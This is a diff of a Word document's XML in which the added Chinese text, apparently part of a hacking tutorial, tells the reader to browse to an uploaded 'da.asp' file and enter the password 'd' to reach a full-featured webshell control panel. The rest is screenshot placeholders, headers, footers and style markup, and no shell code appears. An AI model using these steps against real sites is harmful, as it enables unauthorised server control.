+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>然后使用浏览器访问刚刚上传的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>da.asp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5274310" cy="2937267"/>
+            <wp:effectExtent l="19050" t="19050" r="21590" b="15483"/>
+            <wp:docPr id="58" name="图片 34"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 34"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId54"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="2937267"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:solidFill>
+                        <a:schemeClr val="bg1">
+                          <a:lumMod val="65000"/>
+                        </a:schemeClr>
+                      </a:solidFill>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>输入密码</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，就可以进入大马控制界面，里面的功能很丰富</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5274310" cy="2501685"/>
+            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
+            <wp:docPr id="59" name="图片 37"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 37"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId55"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="2501685"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
     <w:sectPr>
+      <w:headerReference w:type="even" r:id="rId56"/>
+      <w:headerReference w:type="default" r:id="rId57"/>
+      <w:footerReference w:type="even" r:id="rId58"/>
+      <w:footerReference w:type="default" r:id="rId59"/>
+      <w:headerReference w:type="first" r:id="rId60"/>
+      <w:footerReference w:type="first" r:id="rId61"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/>
       <w:cols w:space="425"/>
@@ -2542,8 +4057,124 @@
 </w:document>
 </file>
 
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:endnotes xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+  <w:endnote w:type="separator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="120"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="120"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
+<file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
+<w:ftr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="a7"/>
+      <w:spacing w:before="120" w:after="120"/>
+    </w:pPr>
+  </w:p>
+</w:ftr>
+</file>
+
+<file path=word/footer2.xml><?xml version="1.0" encoding="utf-8"?>
+<w:ftr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="a7"/>
+      <w:spacing w:before="120" w:after="120"/>
+    </w:pPr>
+  </w:p>
+</w:ftr>
+</file>
+
+<file path=word/footer3.xml><?xml version="1.0" encoding="utf-8"?>
+<w:ftr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="a7"/>
+      <w:spacing w:before="120" w:after="120"/>
+    </w:pPr>
+  </w:p>
+</w:ftr>
+</file>
+
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+  <w:footnote w:type="separator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="120"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="120"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
+</file>
+
+<file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
+<w:hdr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="a6"/>
+      <w:spacing w:before="120" w:after="120"/>
+    </w:pPr>
+  </w:p>
+</w:hdr>
+</file>
+
+<file path=word/header2.xml><?xml version="1.0" encoding="utf-8"?>
+<w:hdr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="a6"/>
+      <w:spacing w:before="120" w:after="120"/>
+    </w:pPr>
+  </w:p>
+</w:hdr>
+</file>
+
+<file path=word/header3.xml><?xml version="1.0" encoding="utf-8"?>
+<w:hdr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="a6"/>
+      <w:spacing w:before="120" w:after="120"/>
+    </w:pPr>
+  </w:p>
+</w:hdr>
+</file>
+
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se">
+<w:styles xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -2560,383 +4191,149 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="371">
-    <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="line number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
-    <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/>
-    <w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Note Heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
-    <w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/>
-    <w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid" w:uiPriority="39"/>
-    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
-    <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
-    <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List" w:uiPriority="61"/>
